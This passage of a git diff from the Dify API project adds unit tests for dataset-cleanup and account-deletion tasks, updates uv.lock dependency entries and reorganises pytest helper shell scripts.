+ + Scenario: + - Document references an upload_file_id that doesn't exist + + Expected behavior: + - No error is raised + - Cleanup continues normally + """ + # Arrange + mock_document = MagicMock() + mock_document.id = str(uuid.uuid4()) + mock_document.tenant_id = tenant_id + mock_document.data_source_type = "upload_file" + mock_document.data_source_info = '{"upload_file_id": "nonexistent-file"}' + mock_document.data_source_info_dict = {"upload_file_id": "nonexistent-file"} + + mock_db_session.session.scalars.return_value.all.side_effect = [ + [mock_document], # documents + [], # segments + ] + mock_db_session.session.query.return_value.where.return_value.first.return_value = None + + # Act - should not raise exception + clean_dataset_task( + dataset_id=dataset_id, + tenant_id=tenant_id, + indexing_technique="high_quality", + index_struct='{"type": "paragraph"}', + collection_binding_id=collection_binding_id, + doc_form="paragraph_index", + ) + + # Assert + mock_storage.delete.assert_not_called() + mock_db_session.session.commit.assert_called_once() + + def test_clean_dataset_task_handles_non_upload_file_data_source( + self, + dataset_id, + tenant_id, + collection_binding_id, + mock_db_session, + mock_storage, + mock_index_processor_factory, + mock_get_image_upload_file_ids, + ): + """ + Test that non-upload_file data sources are skipped. 
+ + Scenario: + - Document has data_source_type = "website" + + Expected behavior: + - No file deletion is attempted + """ + # Arrange + mock_document = MagicMock() + mock_document.id = str(uuid.uuid4()) + mock_document.tenant_id = tenant_id + mock_document.data_source_type = "website" + mock_document.data_source_info = None + + mock_db_session.session.scalars.return_value.all.side_effect = [ + [mock_document], # documents + [], # segments + ] + + # Act + clean_dataset_task( + dataset_id=dataset_id, + tenant_id=tenant_id, + indexing_technique="high_quality", + index_struct='{"type": "paragraph"}', + collection_binding_id=collection_binding_id, + doc_form="paragraph_index", + ) + + # Assert - storage delete should not be called for document files + # (only for image files in segments, which are empty here) + mock_storage.delete.assert_not_called() + + +# ============================================================================ +# Test Image File Cleanup +# ============================================================================ + + +class TestImageFileCleanup: + """Test cases for image file cleanup in segments.""" + + def test_clean_dataset_task_deletes_image_files_in_segments( + self, + dataset_id, + tenant_id, + collection_binding_id, + mock_db_session, + mock_storage, + mock_index_processor_factory, + mock_get_image_upload_file_ids, + ): + """ + Test that image files referenced in segment content are deleted. 
+ + Scenario: + - Segment content contains image file references + - get_image_upload_file_ids returns file IDs + + Expected behavior: + - Each image file is deleted from storage + - Each image file record is deleted from database + """ + # Arrange + # Need at least one document for segment processing to occur (code is in else block) + mock_document = MagicMock() + mock_document.id = str(uuid.uuid4()) + mock_document.tenant_id = tenant_id + mock_document.data_source_type = "website" # Non-upload type + + mock_segment = MagicMock() + mock_segment.id = str(uuid.uuid4()) + mock_segment.content = ' ' + + image_file_ids = ["image-1", "image-2"] + mock_get_image_upload_file_ids.return_value = image_file_ids + + mock_image_files = [] + for file_id in image_file_ids: + mock_file = MagicMock() + mock_file.id = file_id + mock_file.key = f"images/{file_id}.jpg" + mock_image_files.append(mock_file) + + mock_db_session.session.scalars.return_value.all.side_effect = [ + [mock_document], # documents - need at least one for segment processing + [mock_segment], # segments + ] + + # Setup a mock query chain that returns files in sequence + mock_query = MagicMock() + mock_where = MagicMock() + mock_query.where.return_value = mock_where + mock_where.first.side_effect = mock_image_files + mock_db_session.session.query.return_value = mock_query + + # Act + clean_dataset_task( + dataset_id=dataset_id, + tenant_id=tenant_id, + indexing_technique="high_quality", + index_struct='{"type": "paragraph"}', + collection_binding_id=collection_binding_id, + doc_form="paragraph_index", + ) + + # Assert + assert mock_storage.delete.call_count == 2 + mock_storage.delete.assert_any_call("images/image-1.jpg") + mock_storage.delete.assert_any_call("images/image-2.jpg") + + def test_clean_dataset_task_handles_missing_image_file( + self, + dataset_id, + tenant_id, + collection_binding_id, + mock_db_session, + mock_storage, + mock_index_processor_factory, + mock_get_image_upload_file_ids, + ): + """ + Test 
that missing image files are handled gracefully. + + Scenario: + - Segment references image file ID that doesn't exist in database + + Expected behavior: + - No error is raised + - Cleanup continues + """ + # Arrange + # Need at least one document for segment processing to occur (code is in else block) + mock_document = MagicMock() + mock_document.id = str(uuid.uuid4()) + mock_document.tenant_id = tenant_id + mock_document.data_source_type = "website" # Non-upload type + + mock_segment = MagicMock() + mock_segment.id = str(uuid.uuid4()) + mock_segment.content = '' + + mock_get_image_upload_file_ids.return_value = ["nonexistent-image"] + + mock_db_session.session.scalars.return_value.all.side_effect = [ + [mock_document], # documents - need at least one for segment processing + [mock_segment], # segments + ] + + # Image file not found + mock_db_session.session.query.return_value.where.return_value.first.return_value = None + + # Act - should not raise exception + clean_dataset_task( + dataset_id=dataset_id, + tenant_id=tenant_id, + indexing_technique="high_quality", + index_struct='{"type": "paragraph"}', + collection_binding_id=collection_binding_id, + doc_form="paragraph_index", + ) + + # Assert + mock_storage.delete.assert_not_called() + mock_db_session.session.commit.assert_called_once() + + +# ============================================================================ +# Test Edge Cases +# ============================================================================ + + +class TestEdgeCases: + """Test edge cases and boundary conditions.""" + + def test_clean_dataset_task_multiple_documents_and_segments( + self, + dataset_id, + tenant_id, + collection_binding_id, + mock_db_session, + mock_storage, + mock_index_processor_factory, + mock_get_image_upload_file_ids, + ): + """ + Test cleanup of multiple documents and segments. 
+ + Scenario: + - Dataset has 5 documents and 10 segments + + Expected behavior: + - All documents and segments are deleted + """ + # Arrange + mock_documents = [] + for i in range(5): + doc = MagicMock() + doc.id = str(uuid.uuid4()) + doc.tenant_id = tenant_id + doc.data_source_type = "website" # Non-upload type + mock_documents.append(doc) + + mock_segments = [] + for i in range(10): + seg = MagicMock() + seg.id = str(uuid.uuid4()) + seg.content = f"Segment content {i}" + mock_segments.append(seg) + + mock_db_session.session.scalars.return_value.all.side_effect = [ + mock_documents, + mock_segments, + ] + mock_get_image_upload_file_ids.return_value = [] + + # Act + clean_dataset_task( + dataset_id=dataset_id, + tenant_id=tenant_id, + indexing_technique="high_quality", + index_struct='{"type": "paragraph"}', + collection_binding_id=collection_binding_id, + doc_form="paragraph_index", + ) + + # Assert - all documents and segments should be deleted + delete_calls = mock_db_session.session.delete.call_args_list + deleted_items = [call[0][0] for call in delete_calls] + + for doc in mock_documents: + assert doc in deleted_items + for seg in mock_segments: + assert seg in deleted_items + + def test_clean_dataset_task_document_with_empty_data_source_info( + self, + dataset_id, + tenant_id, + collection_binding_id, + mock_db_session, + mock_storage, + mock_index_processor_factory, + mock_get_image_upload_file_ids, + ): + """ + Test handling of document with empty data_source_info. 
+ + Scenario: + - Document has data_source_type = "upload_file" + - data_source_info is None or empty + + Expected behavior: + - No error is raised + - File deletion is skipped + """ + # Arrange + mock_document = MagicMock() + mock_document.id = str(uuid.uuid4()) + mock_document.tenant_id = tenant_id + mock_document.data_source_type = "upload_file" + mock_document.data_source_info = None + + mock_db_session.session.scalars.return_value.all.side_effect = [ + [mock_document], # documents + [], # segments + ] + + # Act - should not raise exception + clean_dataset_task( + dataset_id=dataset_id, + tenant_id=tenant_id, + indexing_technique="high_quality", + index_struct='{"type": "paragraph"}', + collection_binding_id=collection_binding_id, + doc_form="paragraph_index", + ) + + # Assert + mock_storage.delete.assert_not_called() + mock_db_session.session.commit.assert_called_once() + + def test_clean_dataset_task_session_always_closed( + self, + dataset_id, + tenant_id, + collection_binding_id, + mock_db_session, + mock_storage, + mock_index_processor_factory, + mock_get_image_upload_file_ids, + ): + """ + Test that database session is always closed regardless of success or failure. 
+ + Expected behavior: + - Session.close() is called in finally block + """ + # Act + clean_dataset_task( + dataset_id=dataset_id, + tenant_id=tenant_id, + indexing_technique="high_quality", + index_struct='{"type": "paragraph"}', + collection_binding_id=collection_binding_id, + doc_form="paragraph_index", + ) + + # Assert + mock_db_session.session.close.assert_called_once() + + +# ============================================================================ +# Test IndexProcessor Parameters +# ============================================================================ + + +class TestIndexProcessorParameters: + """Test cases for IndexProcessor clean method parameters.""" + + def test_clean_dataset_task_passes_correct_parameters_to_index_processor( + self, + dataset_id, + tenant_id, + collection_binding_id, + mock_db_session, + mock_storage, + mock_index_processor_factory, + mock_get_image_upload_file_ids, + ): + """ + Test that correct parameters are passed to IndexProcessor.clean(). + + Expected behavior: + - with_keywords=True is passed + - delete_child_chunks=True is passed + - Dataset object with correct attributes is passed + """ + # Arrange + indexing_technique = "high_quality" + index_struct = '{"type": "paragraph"}' + + # Act + clean_dataset_task( + dataset_id=dataset_id, + tenant_id=tenant_id, + indexing_technique=indexing_technique, + index_struct=index_struct, + collection_binding_id=collection_binding_id, + doc_form="paragraph_index", + ) + + # Assert + mock_index_processor_factory["processor"].clean.assert_called_once() + call_args = mock_index_processor_factory["processor"].clean.call_args + + # Verify positional arguments + dataset_arg = call_args[0][0] + assert dataset_arg.id == dataset_id + assert dataset_arg.tenant_id == tenant_id + assert dataset_arg.indexing_technique == indexing_technique + assert dataset_arg.index_struct == index_struct + assert dataset_arg.collection_binding_id == collection_binding_id + + # Verify None is passed as second 
argument + assert call_args[0][1] is None + + # Verify keyword arguments + assert call_args[1]["with_keywords"] is True + assert call_args[1]["delete_child_chunks"] is True diff --git a/api/tests/unit_tests/tasks/test_delete_account_task.py b/api/tests/unit_tests/tasks/test_delete_account_task.py new file mode 100644 index 0000000000..3b148e63f2 --- /dev/null +++ b/api/tests/unit_tests/tasks/test_delete_account_task.py @@ -0,0 +1,112 @@ +""" +Unit tests for delete_account_task. + +Covers: +- Billing enabled with existing account: calls billing and sends success email +- Billing disabled with existing account: skips billing, sends success email +- Account not found: still calls billing when enabled, does not send email +- Billing deletion raises: logs and re-raises, no email +""" + +from types import SimpleNamespace +from unittest.mock import MagicMock, patch + +import pytest + +from tasks.delete_account_task import delete_account_task + + +@pytest.fixture +def mock_db_session(): + """Mock the db.session used in delete_account_task.""" + with patch("tasks.delete_account_task.db.session") as mock_session: + mock_query = MagicMock() + mock_session.query.return_value = mock_query + mock_query.where.return_value = mock_query + yield mock_session + + +@pytest.fixture +def mock_deps(): + """Patch external dependencies: BillingService and send_deletion_success_task.""" + with ( + patch("tasks.delete_account_task.BillingService") as mock_billing, + patch("tasks.delete_account_task.send_deletion_success_task") as mock_mail_task, + ): + # ensure .delay exists on the mail task + mock_mail_task.delay = MagicMock() + yield { + "billing": mock_billing, + "mail_task": mock_mail_task, + } + + +def _set_account_found(mock_db_session, email: str = "user@example.com"): + account = SimpleNamespace(email=email) + mock_db_session.query.return_value.where.return_value.first.return_value = account + return account + + +def _set_account_missing(mock_db_session): + 
mock_db_session.query.return_value.where.return_value.first.return_value = None + + +class TestDeleteAccountTask: + def test_billing_enabled_account_exists_calls_billing_and_sends_email(self, mock_db_session, mock_deps): + # Arrange + account_id = "acc-123" + account = _set_account_found(mock_db_session, email="a@b.com") + + # Enable billing + with patch("tasks.delete_account_task.dify_config.BILLING_ENABLED", True): + # Act + delete_account_task(account_id) + + # Assert + mock_deps["billing"].delete_account.assert_called_once_with(account_id) + mock_deps["mail_task"].delay.assert_called_once_with(account.email) + + def test_billing_disabled_account_exists_sends_email_only(self, mock_db_session, mock_deps): + # Arrange + account_id = "acc-456" + account = _set_account_found(mock_db_session, email="x@y.com") + + # Disable billing + with patch("tasks.delete_account_task.dify_config.BILLING_ENABLED", False): + # Act + delete_account_task(account_id) + + # Assert + mock_deps["billing"].delete_account.assert_not_called() + mock_deps["mail_task"].delay.assert_called_once_with(account.email) + + def test_account_not_found_billing_enabled_calls_billing_no_email(self, mock_db_session, mock_deps, caplog): + # Arrange + account_id = "missing-id" + _set_account_missing(mock_db_session) + + # Enable billing + with patch("tasks.delete_account_task.dify_config.BILLING_ENABLED", True): + # Act + delete_account_task(account_id) + + # Assert + mock_deps["billing"].delete_account.assert_called_once_with(account_id) + mock_deps["mail_task"].delay.assert_not_called() + # Optional: verify log contains not found message + assert any("not found" in rec.getMessage().lower() for rec in caplog.records) + + def test_billing_delete_raises_propagates_and_no_email(self, mock_db_session, mock_deps): + # Arrange + account_id = "acc-err" + _set_account_found(mock_db_session, email="err@ex.com") + mock_deps["billing"].delete_account.side_effect = RuntimeError("billing down") + + # Enable billing + 
with patch("tasks.delete_account_task.dify_config.BILLING_ENABLED", True): + # Act & Assert + with pytest.raises(RuntimeError): + delete_account_task(account_id) + + # Ensure email was not sent + mock_deps["mail_task"].delay.assert_not_called() diff --git a/api/uv.lock b/api/uv.lock index 44703a0247..8d0dffbd8f 100644 --- a/api/uv.lock +++ b/api/uv.lock @@ -291,6 +291,22 @@ dependencies = [ ] sdist = { url = "https://files.pythonhosted.org/packages/32/eb/5e82e419c3061823f3feae9b5681588762929dc4da0176667297c2784c1a/alibabacloud_tea_xml-0.0.3.tar.gz", hash = "sha256:979cb51fadf43de77f41c69fc69c12529728919f849723eb0cd24eb7b048a90c", size = 3466, upload-time = "2025-07-01T08:04:55.144Z" } +[[package]] +name = "aliyun-log-python-sdk" +version = "0.9.37" +source = { registry = "https://pypi.org/simple" } +dependencies = [ + { name = "dateparser" }, + { name = "elasticsearch" }, + { name = "jmespath" }, + { name = "lz4" }, + { name = "protobuf" }, + { name = "python-dateutil" }, + { name = "requests" }, + { name = "six" }, +] +sdist = { url = "https://files.pythonhosted.org/packages/90/70/291d494619bb7b0cbcc00689ad995945737c2c9e0bff2733e0aa7dbaee14/aliyun_log_python_sdk-0.9.37.tar.gz", hash = "sha256:ea65c9cca3a7377cef87d568e897820338328a53a7acb1b02f1383910e103f68", size = 152549, upload-time = "2025-11-27T07:56:06.098Z" } + [[package]] name = "aliyun-python-sdk-core" version = "2.16.0" @@ -1293,6 +1309,21 @@ wheels = [ { url = "https://files.pythonhosted.org/packages/c3/be/d0d44e092656fe7a06b55e6103cbce807cdbdee17884a5367c68c9860853/dataclasses_json-0.6.7-py3-none-any.whl", hash = "sha256:0dbf33f26c8d5305befd61b39d2b3414e8a407bedc2834dea9b8d642666fb40a", size = 28686, upload-time = "2024-06-09T16:20:16.715Z" }, ] +[[package]] +name = "dateparser" +version = "1.2.2" +source = { registry = "https://pypi.org/simple" } +dependencies = [ + { name = "python-dateutil" }, + { name = "pytz" }, + { name = "regex" }, + { name = "tzlocal" }, +] +sdist = { url = 
"https://files.pythonhosted.org/packages/a9/30/064144f0df1749e7bb5faaa7f52b007d7c2d08ec08fed8411aba87207f68/dateparser-1.2.2.tar.gz", hash = "sha256:986316f17cb8cdc23ea8ce563027c5ef12fc725b6fb1d137c14ca08777c5ecf7", size = 329840, upload-time = "2025-06-26T09:29:23.211Z" } +wheels = [ + { url = "https://files.pythonhosted.org/packages/87/22/f020c047ae1346613db9322638186468238bcfa8849b4668a22b97faad65/dateparser-1.2.2-py3-none-any.whl", hash = "sha256:5a5d7211a09013499867547023a2a0c91d5a27d15dd4dbcea676ea9fe66f2482", size = 315453, upload-time = "2025-06-26T09:29:21.412Z" }, +] + [[package]] name = "decorator" version = "5.2.1" @@ -1337,9 +1368,10 @@ wheels = [ [[package]] name = "dify-api" -version = "1.11.0" +version = "1.11.1" source = { virtual = "." } dependencies = [ + { name = "aliyun-log-python-sdk" }, { name = "apscheduler" }, { name = "arize-phoenix-otel" }, { name = "azure-identity" }, @@ -1515,6 +1547,7 @@ vdb = [ { name = "clickzetta-connector-python" }, { name = "couchbase" }, { name = "elasticsearch" }, + { name = "intersystems-irispython" }, { name = "mo-vector" }, { name = "mysql-connector-python" }, { name = "opensearch-py" }, @@ -1536,6 +1569,7 @@ vdb = [ [package.metadata] requires-dist = [ + { name = "aliyun-log-python-sdk", specifier = "~=0.9.37" }, { name = "apscheduler", specifier = ">=3.11.0" }, { name = "arize-phoenix-otel", specifier = "~=0.9.2" }, { name = "azure-identity", specifier = "==1.16.1" }, @@ -1711,6 +1745,7 @@ vdb = [ { name = "clickzetta-connector-python", specifier = ">=0.8.102" }, { name = "couchbase", specifier = "~=4.3.0" }, { name = "elasticsearch", specifier = "==8.14.0" }, + { name = "intersystems-irispython", specifier = ">=5.1.0" }, { name = "mo-vector", specifier = "~=0.1.13" }, { name = "mysql-connector-python", specifier = ">=9.3.0" }, { name = "opensearch-py", specifier = "==2.4.0" }, @@ -2918,6 +2953,18 @@ wheels = [ { url = 
"https://files.pythonhosted.org/packages/cb/b1/3846dd7f199d53cb17f49cba7e651e9ce294d8497c8c150530ed11865bb8/iniconfig-2.3.0-py3-none-any.whl", hash = "sha256:f631c04d2c48c52b84d0d0549c99ff3859c98df65b3101406327ecc7d53fbf12", size = 7484, upload-time = "2025-10-18T21:55:41.639Z" }, ] +[[package]] +name = "intersystems-irispython" +version = "5.3.0" +source = { registry = "https://pypi.org/simple" } +wheels = [ + { url = "https://files.pythonhosted.org/packages/5d/56/16d93576b50408d97a5cbbd055d8da024d585e96a360e2adc95b41ae6284/intersystems_irispython-5.3.0-cp38.cp39.cp310.cp311.cp312.cp313-cp38.cp39.cp310.cp311.cp312.cp313-macosx_10_9_universal2.whl", hash = "sha256:59d3176a35867a55b1ab69a6b5c75438b460291bccb254c2d2f4173be08b6e55", size = 6594480, upload-time = "2025-10-09T20:47:27.629Z" }, + { url = "https://files.pythonhosted.org/packages/99/bc/19e144ee805ea6ee0df6342a711e722c84347c05a75b3bf040c5fbe19982/intersystems_irispython-5.3.0-cp38.cp39.cp310.cp311.cp312.cp313-cp38.cp39.cp310.cp311.cp312.cp313-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:56bccefd1997c25f9f9f6c4086214c18d4fdaac0a93319d4b21dd9a6c59c9e51", size = 14779928, upload-time = "2025-10-09T20:47:30.564Z" }, + { url = "https://files.pythonhosted.org/packages/e6/fb/59ba563a80b39e9450b4627b5696019aa831dce27dacc3831b8c1e669102/intersystems_irispython-5.3.0-cp38.cp39.cp310.cp311.cp312.cp313-cp38.cp39.cp310.cp311.cp312.cp313-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:3e160adc0785c55bb64e4264b8e99075691a15b0afa5d8d529f1b4bac7e57b81", size = 14422035, upload-time = "2025-10-09T20:47:32.552Z" }, + { url = "https://files.pythonhosted.org/packages/c1/68/ade8ad43f0ed1e5fba60e1710fa5ddeb01285f031e465e8c006329072e63/intersystems_irispython-5.3.0-cp38.cp39.cp310.cp311.cp312.cp313-cp38.cp39.cp310.cp311.cp312.cp313-win32.whl", hash = "sha256:820f2c5729119e5173a5bf6d6ac2a41275c4f1ffba6af6c59ea313ecd8f499cc", size = 2824316, upload-time = "2025-10-09T20:47:28.998Z" }, + { url = 
"https://files.pythonhosted.org/packages/f4/03/cd45cb94e42c01dc525efebf3c562543a18ee55b67fde4022665ca672351/intersystems_irispython-5.3.0-cp38.cp39.cp310.cp311.cp312.cp313-cp38.cp39.cp310.cp311.cp312.cp313-win_amd64.whl", hash = "sha256:fc07ec24bc50b6f01573221cd7d86f2937549effe31c24af8db118e0131e340c", size = 3463297, upload-time = "2025-10-09T20:47:34.636Z" }, +] + [[package]] name = "intervaltree" version = "3.1.0" @@ -6802,11 +6849,11 @@ wheels = [ [[package]] name = "urllib3" -version = "2.5.0" +version = "2.6.0" source = { registry = "https://pypi.org/simple" } -sdist = { url = "https://files.pythonhosted.org/packages/15/22/9ee70a2574a4f4599c47dd506532914ce044817c7752a79b6a51286319bc/urllib3-2.5.0.tar.gz", hash = "sha256:3fc47733c7e419d4bc3f6b3dc2b4f890bb743906a30d56ba4a5bfa4bbff92760", size = 393185, upload-time = "2025-06-18T14:07:41.644Z" } +sdist = { url = "https://files.pythonhosted.org/packages/1c/43/554c2569b62f49350597348fc3ac70f786e3c32e7f19d266e19817812dd3/urllib3-2.6.0.tar.gz", hash = "sha256:cb9bcef5a4b345d5da5d145dc3e30834f58e8018828cbc724d30b4cb7d4d49f1", size = 432585, upload-time = "2025-12-05T15:08:47.885Z" } wheels = [ - { url = "https://files.pythonhosted.org/packages/a7/c2/fe1e52489ae3122415c51f387e221dd0773709bad6c6cdaa599e8a2c5185/urllib3-2.5.0-py3-none-any.whl", hash = "sha256:e6b01673c0fa6a13e374b50871808eb3bf7046c4b125b216f6bf1cc604cff0dc", size = 129795, upload-time = "2025-06-18T14:07:40.39Z" }, + { url = "https://files.pythonhosted.org/packages/56/1a/9ffe814d317c5224166b23e7c47f606d6e473712a2fad0f704ea9b99f246/urllib3-2.6.0-py3-none-any.whl", hash = "sha256:c90f7a39f716c572c4e3e58509581ebd83f9b59cced005b7db7ad2d22b0db99f", size = 131083, upload-time = "2025-12-05T15:08:45.983Z" }, ] [[package]] @@ -6900,7 +6947,7 @@ wheels = [ [[package]] name = "wandb" -version = "0.23.0" +version = "0.23.1" source = { registry = "https://pypi.org/simple" } dependencies = [ { name = "click" }, @@ -6914,17 +6961,17 @@ dependencies = [ { name = 
"sentry-sdk" }, { name = "typing-extensions" }, ] -sdist = { url = "https://files.pythonhosted.org/packages/ef/8b/db2d44395c967cd452517311fd6ede5d1e07310769f448358d4874248512/wandb-0.23.0.tar.gz", hash = "sha256:e5f98c61a8acc3ee84583ca78057f64344162ce026b9f71cb06eea44aec27c93", size = 44413921, upload-time = "2025-11-11T21:06:30.737Z" } +sdist = { url = "https://files.pythonhosted.org/packages/0a/cc/770ae3aa7ae44f6792f7ecb81c14c0e38b672deb35235719bb1006519487/wandb-0.23.1.tar.gz", hash = "sha256:f6fb1e3717949b29675a69359de0eeb01e67d3360d581947d5b3f98c273567d6", size = 44298053, upload-time = "2025-12-03T02:25:10.79Z" } wheels = [ - { url = "https://files.pythonhosted.org/packages/41/61/a3220c7fa4cadfb2b2a5c09e3fa401787326584ade86d7c1f58bf1cd43bd/wandb-0.23.0-py3-none-macosx_12_0_arm64.whl", hash = "sha256:b682ec5e38fc97bd2e868ac7615a0ab4fc6a15220ee1159e87270a5ebb7a816d", size = 18992250, upload-time = "2025-11-11T21:06:03.412Z" }, - { url = "https://files.pythonhosted.org/packages/90/16/e69333cf3d11e7847f424afc6c8ae325e1f6061b2e5118d7a17f41b6525d/wandb-0.23.0-py3-none-macosx_12_0_x86_64.whl", hash = "sha256:ec094eb71b778e77db8c188da19e52c4f96cb9d5b4421d7dc05028afc66fd7e7", size = 20045616, upload-time = "2025-11-11T21:06:07.109Z" }, - { url = "https://files.pythonhosted.org/packages/62/79/42dc6c7bb0b425775fe77f1a3f1a22d75d392841a06b43e150a3a7f2553a/wandb-0.23.0-py3-none-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:4e43f1f04b98c34f407dcd2744cec0a590abce39bed14a61358287f817514a7b", size = 18758848, upload-time = "2025-11-11T21:06:09.832Z" }, - { url = "https://files.pythonhosted.org/packages/b8/94/d6ddb78334996ccfc1179444bfcfc0f37ffd07ee79bb98940466da6f68f8/wandb-0.23.0-py3-none-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:6e5847f98cbb3175caf5291932374410141f5bb3b7c25f9c5e562c1988ce0bf5", size = 20231493, upload-time = "2025-11-11T21:06:12.323Z" }, - { url = 
"https://files.pythonhosted.org/packages/52/4d/0ad6df0e750c19dabd24d2cecad0938964f69a072f05fbdab7281bec2b64/wandb-0.23.0-py3-none-musllinux_1_2_aarch64.whl", hash = "sha256:6151355fd922539926e870be811474238c9614b96541773b990f1ce53368aef6", size = 18793473, upload-time = "2025-11-11T21:06:14.967Z" }, - { url = "https://files.pythonhosted.org/packages/f8/da/c2ba49c5573dff93dafc0acce691bb1c3d57361bf834b2f2c58e6193439b/wandb-0.23.0-py3-none-musllinux_1_2_x86_64.whl", hash = "sha256:df62e426e448ebc44269140deb7240df474e743b12d4b1f53b753afde4aa06d4", size = 20332882, upload-time = "2025-11-11T21:06:17.865Z" }, - { url = "https://files.pythonhosted.org/packages/40/65/21bfb10ee5cd93fbcaf794958863c7e05bac4bbeb1cc1b652094aa3743a5/wandb-0.23.0-py3-none-win32.whl", hash = "sha256:6c21d3eadda17aef7df6febdffdddfb0b4835c7754435fc4fe27631724269f5c", size = 19433198, upload-time = "2025-11-11T21:06:21.913Z" }, - { url = "https://files.pythonhosted.org/packages/f1/33/cbe79e66c171204e32cf940c7fdfb8b5f7d2af7a00f301c632f3a38aa84b/wandb-0.23.0-py3-none-win_amd64.whl", hash = "sha256:b50635fa0e16e528bde25715bf446e9153368428634ca7a5dbd7a22c8ae4e915", size = 19433201, upload-time = "2025-11-11T21:06:24.607Z" }, - { url = "https://files.pythonhosted.org/packages/1c/a0/5ecfae12d78ea036a746c071e4c13b54b28d641efbba61d2947c73b3e6f9/wandb-0.23.0-py3-none-win_arm64.whl", hash = "sha256:fa0181b02ce4d1993588f4a728d8b73ae487eb3cb341e6ce01c156be7a98ec72", size = 17678649, upload-time = "2025-11-11T21:06:27.289Z" }, + { url = "https://files.pythonhosted.org/packages/12/0b/c3d7053dfd93fd259a63c7818d9c4ac2ba0642ff8dc8db98662ea0cf9cc0/wandb-0.23.1-py3-none-macosx_12_0_arm64.whl", hash = "sha256:358e15471d19b7d73fc464e37371c19d44d39e433252ac24df107aff993a286b", size = 21527293, upload-time = "2025-12-03T02:24:48.011Z" }, + { url = "https://files.pythonhosted.org/packages/ee/9f/059420fa0cb6c511dc5c5a50184122b6aca7b178cb2aa210139e354020da/wandb-0.23.1-py3-none-macosx_12_0_x86_64.whl", hash = 
"sha256:110304407f4b38f163bdd50ed5c5225365e4df3092f13089c30171a75257b575", size = 22745926, upload-time = "2025-12-03T02:24:50.519Z" }, + { url = "https://files.pythonhosted.org/packages/96/b6/fd465827c14c64d056d30b4c9fcf4dac889a6969dba64489a88fc4ffa333/wandb-0.23.1-py3-none-manylinux_2_28_aarch64.whl", hash = "sha256:6cc984cf85feb2f8ee0451d76bc9fb7f39da94956bb8183e30d26284cf203b65", size = 21212973, upload-time = "2025-12-03T02:24:52.828Z" }, + { url = "https://files.pythonhosted.org/packages/5c/ee/9a8bb9a39cc1f09c3060456cc79565110226dc4099a719af5c63432da21d/wandb-0.23.1-py3-none-manylinux_2_28_x86_64.whl", hash = "sha256:67431cd3168d79fdb803e503bd669c577872ffd5dadfa86de733b3274b93088e", size = 22887885, upload-time = "2025-12-03T02:24:55.281Z" }, + { url = "https://files.pythonhosted.org/packages/6d/4d/8d9e75add529142e037b05819cb3ab1005679272950128d69d218b7e5b2e/wandb-0.23.1-py3-none-musllinux_1_2_aarch64.whl", hash = "sha256:07be70c0baa97ea25fadc4a9d0097f7371eef6dcacc5ceb525c82491a31e9244", size = 21250967, upload-time = "2025-12-03T02:24:57.603Z" }, + { url = "https://files.pythonhosted.org/packages/97/72/0b35cddc4e4168f03c759b96d9f671ad18aec8bdfdd84adfea7ecb3f5701/wandb-0.23.1-py3-none-musllinux_1_2_x86_64.whl", hash = "sha256:216c95b08e0a2ec6a6008373b056d597573d565e30b43a7a93c35a171485ee26", size = 22988382, upload-time = "2025-12-03T02:25:00.518Z" }, + { url = "https://files.pythonhosted.org/packages/c0/6d/e78093d49d68afb26f5261a70fc7877c34c114af5c2ee0ab3b1af85f5e76/wandb-0.23.1-py3-none-win32.whl", hash = "sha256:fb5cf0f85692f758a5c36ab65fea96a1284126de64e836610f92ddbb26df5ded", size = 22150756, upload-time = "2025-12-03T02:25:02.734Z" }, + { url = "https://files.pythonhosted.org/packages/05/27/4f13454b44c9eceaac3d6e4e4efa2230b6712d613ff9bf7df010eef4fd18/wandb-0.23.1-py3-none-win_amd64.whl", hash = "sha256:21c8c56e436eb707b7d54f705652e030d48e5cfcba24cf953823eb652e30e714", size = 22150760, upload-time = "2025-12-03T02:25:05.106Z" }, + { url = 
"https://files.pythonhosted.org/packages/30/20/6c091d451e2a07689bfbfaeb7592d488011420e721de170884fedd68c644/wandb-0.23.1-py3-none-win_arm64.whl", hash = "sha256:8aee7f3bb573f2c0acf860f497ca9c684f9b35f2ca51011ba65af3d4592b77c1", size = 20137463, upload-time = "2025-12-03T02:25:08.317Z" }, ] [[package]] diff --git a/dev/pytest/pytest_all_tests.sh b/dev/pytest/pytest_all_tests.sh deleted file mode 100755 index 9123b2f8ad..0000000000 --- a/dev/pytest/pytest_all_tests.sh +++ /dev/null @@ -1,20 +0,0 @@ -#!/bin/bash -set -x - -SCRIPT_DIR="$(dirname "$(realpath "$0")")" -cd "$SCRIPT_DIR/../.." - -# ModelRuntime -dev/pytest/pytest_model_runtime.sh - -# Tools -dev/pytest/pytest_tools.sh - -# Workflow -dev/pytest/pytest_workflow.sh - -# Unit tests -dev/pytest/pytest_unit_tests.sh - -# TestContainers tests -dev/pytest/pytest_testcontainers.sh diff --git a/dev/pytest/pytest_artifacts.sh b/dev/pytest/pytest_artifacts.sh deleted file mode 100755 index 29cacdcc07..0000000000 --- a/dev/pytest/pytest_artifacts.sh +++ /dev/null @@ -1,9 +0,0 @@ -#!/bin/bash -set -x - -SCRIPT_DIR="$(dirname "$(realpath "$0")")" -cd "$SCRIPT_DIR/../.." - -PYTEST_TIMEOUT="${PYTEST_TIMEOUT:-120}" - -pytest --timeout "${PYTEST_TIMEOUT}" api/tests/artifact_tests/ diff --git a/dev/pytest/pytest_full.sh b/dev/pytest/pytest_full.sh new file mode 100755 index 0000000000..2989a74ad8 --- /dev/null +++ b/dev/pytest/pytest_full.sh @@ -0,0 +1,58 @@ +#!/bin/bash +set -euo pipefail +set -ex + +SCRIPT_DIR="$(dirname "$(realpath "$0")")" +cd "$SCRIPT_DIR/../.." 
